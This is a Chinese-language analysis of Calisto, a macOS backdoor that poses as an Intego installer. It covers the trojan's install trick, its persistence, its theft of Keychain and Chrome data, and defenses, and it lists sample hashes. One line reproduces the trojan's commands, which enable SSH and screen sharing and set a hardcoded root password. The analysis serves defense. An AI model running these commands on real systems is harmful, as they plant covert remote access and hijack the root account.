macOS Calisto木马分析
字数 1424 2025-08-20 18:17:31
macOS Calisto木马深入分析与防护指南
一、Calisto木马概述
Calisto是macOS平台上的一个后门木马,可能是Proto恶意软件家族的第一个成员。该恶意软件最早于2016年被上传到VirusTotal,但直到2018年5月才被发现,期间两年未被反病毒软件检测到。
二、传播方式
- 伪装形式:未签名的DMG镜像文件
- 伪装对象:Intego安全软件的Mac版本(特别选择第9版)
- 欺骗手段:界面设计与正版软件高度相似,普通用户难以辨别
三、安装过程分析
- 虚假许可协议:显示与Intego不同的许可协议文本(可能使用旧版本协议)
- 凭证收集:要求用户输入用户名和密码(模仿正常软件安装流程)
- 错误诱导:安装过程中故意挂起并报错,建议用户从官网下载新安装包
- 后台活动:在用户认为安装失败时,木马已在后台运行
四、技术特性分析
1. SIP(系统完整性保护)相关行为
-
SIP开启时:
- 活动受限(因开发时未充分考虑2015年发布的SIP机制)
- 尝试修改系统文件时会失败并停止运行
-
SIP关闭时:
- 复制自身到
/System/Library/目录 - 设置开机自启动
- 卸载DMG镜像
- 加入无障碍服务
- 收集额外系统信息
- 开启系统远程访问权限
- 转发数据到C2服务器
- 复制自身到
2. 持久化技术
- 启动项添加:在
/Library/LaunchAgents/创建.plist文件 - DMG卸载命令:
hdiutil detach /Volumes/MacInternetSecurityX9
3. 权限提升技术
- TCC.db修改:直接修改该文件将自己加入无障碍服务(无需用户交互)
- 远程访问配置:
systemsetup -setremotelogin on launchctl load -w /System/Library/LaunchDaemons/com.apple.screensharing.plist dscl . -create /Groups/com.apple.access_ssh dscl . -append /Groups/com.apple.access_ssh user <username> dscl . -passwd /Users/root aGNOStIC7890!!!
4. 数据收集功能
- 存储位置:
.calisto隐藏目录 - 收集内容:
- Keychain存储数据(包括Safari保存的密码和token)
- 用户登录密码窗口数据
- 网络连接信息
- Google Chrome数据(历史记录、书签、Cookie)
5. 未使用功能
- 加载处理USB设备的kernel扩展
- 从用户目录窃取数据
- 系统自毁功能
五、与Backdoor.OSX.Proton的关联
-
相似点:
- 都伪装成知名反病毒软件
- 样本中包含
com.proton.calisto.plist - 都能窃取大量个人数据(包括Keychain内容)
-
时间线:
- Calisto:2016年检测到
- Proton家族:2017年发现
- 推测Calisto可能是Proton的早期版本或原型
六、防护措施
-
系统配置:
- 保持SIP(系统完整性保护)开启状态
- 定期更新操作系统
-
软件安装:
- 仅从可信来源安装经过签名的软件
- 优先选择App Store下载的应用程序
-
安全实践:
- 使用反病毒软件
- 警惕未签名DMG文件的安装
- 注意软件安装过程中的异常行为
-
密码管理:
- 定期检查系统root账户状态
- 发现可疑密码修改立即采取措施
七、样本信息
- DMG镜像MD5:d7ac1b8113c94567be4a26d214964119
- Mach-O可执行文件MD5:2f38b201f6b368d587323a1bec516e5d
八、总结
Calisto木马展示了macOS平台恶意软件的典型特征:利用用户信任、模仿合法软件、结合系统特性进行持久化。其技术虽然相对原始,但通过精心设计的欺骗手段仍能有效感染系统。保持系统默认安全设置、提高安全意识是防御此类威胁的关键。